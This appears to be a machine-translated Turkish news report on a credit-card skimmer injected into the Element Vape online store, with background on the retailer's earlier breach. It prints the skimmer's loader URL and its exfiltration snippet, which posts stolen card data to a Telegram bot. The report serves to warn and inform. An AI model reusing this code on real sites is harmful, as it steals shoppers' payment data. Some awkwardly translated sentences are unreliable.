BleepingComputer, önde gelen çevrimiçi e-sigara ve vaping kitleri satıcısı Element Vape’in, muhtemelen saldırıya uğradıktan sonra canlı sitesinde bir kredi kartı skimmer hizmeti verdiğini doğruladı.
ABD ve Kanada’daki varlığı ile Element Vape, hem perakende satış noktalarında hem de çevrimiçi mağazalarında e-sigara, vaping cihazları, e-sıvılar ve CBD ürünleri satmaktadır.
Vaping sitesi, kredi kartlarını gözden geçirmek için JavaScript’i kullanıyor
Element Vape’in web sitesi, BleepingComputer tarafından görüldüğü gibi, kredi kartı hırsızı içeren bir üçüncü taraf web sitesinden kötü amaçlı bir JavaScript dosyası yüklüyor.
Komut dosyaları enjekte ederek bu tür kredi kartı hırsızlarını e-ticaret mağazalarında kullanan tehdit aktörleri olarak adlandırılır. Sihirbaz.
Ana sayfadan başlayarak mağazanın birden çok web sayfası, aşağıda gösterilen HTML kaynak kodunun 45-50 satırlarında görülebilen, belirsiz bir base64 kodlu komut dosyası içerir:
Kötü amaçlı komut dosyasının ElementVape.com’da ne kadar süredir bulunduğu tam olarak bilinmiyor.
Wayback Machine üzerindeki ElementVape.com analizimiz, yukarıdaki kodun mevcut olmayan 5 Şubat 2022 ve öncesi itibariyle. Bu nedenle, enfeksiyon daha yeni gibi görünüyor, tarihten bir süre sonra ve bugün keşfedilmeden önce ortaya çıkıyor.
Kodu çözüldüğünde, bu altı satır, üçüncü taraf bir sitede barındırılan aşağıdaki JavaScript dosyasını çeker:
//weicowire[.]com/js/jquery/frontend.js
Ağır şekilde gizlenmiş kötü niyetli yük, bu ön uç.js sonuna doğru dosya:
Komut dosyası, ödeme verilerini Telegram aracılığıyla sızdırıyor
Yukarıdaki komut dosyasının kodu çözüldüğünde ve BleepingComputer tarafından analiz edildiğinde, ödeme sırasında müşterilerin ödeme kartı ve fatura bilgilerini topladığı görüldü.
Komut dosyasının aradığı alanlardan bazıları şunlardır: e-posta adresi, ödeme kartı numarası/son kullanma tarihi, telefon numarası, sokak ve posta kodu dahil fatura adresi.
Bu bilgi daha sonra, komut dosyasında bulunan karmaşık, sabit kodlanmış bir Telegram adresi aracılığıyla saldırgana aktarılır:
var x = new XMLHttpRequest();
x.open("POST", "https://api.telegram.org/bot"+tbot+"/sendMessage", true);
x.setRequestHeader('Content-Type', 'application/json; charset=utf-8');
x.withCredentials = false;
var dd = JSON.stringify({
chat_id: tchat,
text: tmessage
});
x.send(dd);
Ayrıca, komut dosyası, korumalı alan ortamında mı yoksa “geliştiriciler“analizi caydırmak için.
Büyük ama belirsiz e-sigara perakendecisi
ElementVape.com’un arka uç kodunun, kötü amaçlı komut dosyasına gizlice girmek için ilk etapta nasıl değiştirildiği açık değil.
Ve bu, Element Vape’in ilk kez tehlikeye atılışı değil.
2018’de Element Vape müşterileri, şirketten bir veri ihlali meydana geldiğini ve “6 Aralık 2017 ile 27 Haziran 2018 arasındaki izinsiz giriş penceresinin” müşterilerin kişisel bilgilerini potansiyel olarak tehdit aktörlerine maruz bıraktığını belirten mektuplar aldıklarını bildirdi. Öğe Vape onaylanmış iddialar şirketin Reddit hesabı gibi görünüyor.
Bu olayın ardından, Illinois merkezli tüketici Artur Tyksinski dava açmak Element Vape, vaping perakendecisinin “veri ihlalinden etkilenen kişilere zamanında bildirimde bulunmadığını” ve müşterilerin gizli bilgilerine yetkisiz erişimi önlemek için yeterli prosedürlere sahip olmadığını iddia etti. Bunu bir sınıf eylemi izledi dava 2019’da jüri tarafından yargılanmasını talep etti.
sözde olmasına rağmen”dünyanın en büyük çevrimiçi Vape perakendecilerinden biriPerakende mağazalarında ve çevrimiçi olarak e-sigaraların sayısı, Element Vape hakkında çok fazla şey bilinmiyor.
olarak bilinir TheSY LLC Bazı eyaletlerde, Element Vape’in Twitter hesabı 13.000’den fazla kullanıcıyı takip ediyor.
Ancak, garip bir şekilde, tweet’leri korunuyor ve bu da perakendeci ile etkileşimi zorlaştırıyor.
Web sitesine göre şirket, California’da bulunuyor ve 2013’ten beri faaliyet gösteriyor.
“Kişisel felsefemiz, tüketicilere ödediklerinden daha fazlasını vermektir. Beklentileri aşmak için tavizsiz bir dürtüyle, yardım etmeye kararlıyız. [sic] Müşteriler mümkün olan en iyi alışveriş deneyimini yaşıyor”, diyor Element Vape’in web sitesi.
Geçen yıl şirket, e-sigaralarını ve elektronik sigara ürünlerini Kanada’nın PUDOpoint Sayaçlarında “alınabilir” hale getirmek için PUDO (Alma veya Bırakma) Inc. ile ortaklık kurdu.
BleepingComputer, sorunu Element Vape’e bildirdi. Zendesk destek sitesianalizimiz sırasında kötü amaçlı komut dosyasını içermiyor gibi görünüyordu.
Kullanıcılar mağazada aktif olarak alışveriş yapıyor olabileceğinden, devam eden bu saldırıyla ilgili ayrıntıları paylaşmanın ve müşterilerin finansal bilgilerinin çalınmasını önlemenin kamu yararına olduğuna inanıyoruz.
Son zamanlarda web sitesinde herhangi bir satın alma işlemi yaptıysanız, kredi kartı işlemlerinizi şüpheli herhangi bir işlem için kontrol ettiğinizden emin olun.